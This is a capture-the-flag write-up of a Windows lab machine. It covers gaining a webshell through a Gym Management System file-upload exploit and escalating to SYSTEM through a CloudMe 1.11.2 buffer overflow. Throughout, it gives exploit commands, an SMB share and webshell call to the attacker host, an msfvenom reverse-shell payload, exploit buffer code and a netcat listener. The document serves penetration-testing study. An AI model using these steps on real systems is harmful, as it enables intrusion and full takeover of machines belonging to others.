This machine exposes a vulnerable gym management web application on port 8080 that allows remote code execution via a file upload exploit. Initial access is obtained as a Windows user, and privilege escalation is performed by exploiting a buffer overflow in a locally running CloudMe service on port 8888.
Target: 10.10.11.X
Main vector: Gym Management System RCE (file upload)
Privilege escalation: CloudMe 1.11.2 buffer overflow (port 8888)
Web service on port 8080:
http://IP:8080 -> Gym Management System
Searchsploit:
$ searchsploit "gym management" -> Exploit with RCE via file upload (ID 48506)
The exploit is a Python2 script that uploads a PHP file with a double extension and triggers it with a
telepathy parameter.
Run the exploit against the target:
$ python2 gym_exploit_rce.py http://IP:8080
The exploit uploads a webshell under /upload/.
To execute commands, the telepathy parameter is used.
Serve tools via SMB from the attacker:
$ impacket-smbserver smbFolder $(pwd) -smb2support
Test command execution:
http://IP:8080/upload/kamehameha.php?telepathy=dir \\KALI_IP\smbFolder
Once command execution is confirmed, a reverse shell can be obtained by hosting nc.exe and calling it
through the webshell (URL-encoding may be required).
After the reverse shell is established, user.txt is accessible.
Enumeration with winPEAS:
C:\> winPEASx64.exe
winPEAS reveals a CloudMe service. Default CloudMe port is 8888.
Confirm locally:
C:\> netstat -nat -> 127.0.0.1:8888 listening
Searchsploit:
$ searchsploit cloudme 1.11.2 -> Exploit ID 48389 (buffer overflow)
A custom Python exploit is used to trigger the overflow and execute a reverse shell payload.
The payload is generated with msfvenom:
$ msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
The shellcode is embedded into bof_exploit.py, which connects to port 8888 and sends the crafted buffer:
target = "127.0.0.1" padding1 = b"\x90" * 1052 EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP; RET NOPS = b"\x90" * 30 buf = (msfvenom shellcode)
The script sends the payload to the CloudMe service:
$ python bof_exploit.py
On the attacker side, a listener is waiting:
$ nc -nlvp 4444
When the exploit succeeds, a reverse shell is obtained as a higher-privileged user (SYSTEM or equivalent),
allowing access to root.txt.
The machine combines a web application RCE (file upload in Gym Management System) with a local buffer overflow in CloudMe. After gaining a foothold through the webshell, the CloudMe service on port 8888 is exploited using a custom Python buffer overflow script with msfvenom shellcode to obtain full system compromise.